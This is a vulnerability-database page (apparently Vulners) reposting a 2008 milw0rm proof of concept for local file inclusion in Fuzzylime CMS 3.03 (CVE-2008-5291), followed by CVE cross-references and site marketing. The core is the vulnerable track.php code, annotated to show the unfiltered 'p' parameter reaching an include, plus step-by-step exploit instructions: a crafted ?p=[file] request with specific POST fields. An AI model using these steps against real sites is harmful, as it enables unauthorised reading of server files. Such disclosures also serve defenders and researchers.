Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2008-5291 | 25 Nov 200800:00 | – | circl | |
| CVE-2008-5291 | 1 Dec 200815:00 | – | cve | |
| CVE-2008-5291 | 1 Dec 200815:00 | – | cvelist | |
| EUVD-2008-5268 | 7 Oct 202500:30 | – | euvd | |
| CVE-2008-5291 | 1 Dec 200815:30 | – | nvd | |
| fuzzylime cms code/track.php Local File Inclusion Vulnerability | 15 Dec 200800:00 | – | openvas | |
| Directory traversal | 1 Dec 200815:30 | – | prion |
/*
--+_---=+--=_____=+++++
-- FuzzyLime 3.03 Local File Iclude PoC
***
(-0-)
-____======_+++++---''''
***************************************__________________
-- Vuln
- code/track.php
$m = $_GET[m];
$p = $_GET[p]; //1
include "settings.inc.php";
if(!isset($_POST[url]) || !isset($_POST[title]) || !isset($_POST[excerpt])) { //2
header("Location: ${rooturl}index.php?s=news&p=$p&m=$m");
}
else {
if(file_exists("../blogs/$p.inc.php")) { //3
include "../blogs/$p.inc.php"; //4
...
1 $p is not filtered
2 When POST'S is set
3 and file exists
4 we have lfi
---+++++....--___________--============
*/
Go to LIVE_HTTP_HEADERS in firefox or opera or whatever
set url http://site/path/code/track.php?p=[file]
set "SEND POST CONNTENT" url=evil&title=666&excerpt=xd
and push reply
//Alfons Luja 25.12.2008
# milw0rm.com [2008-11-25]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02498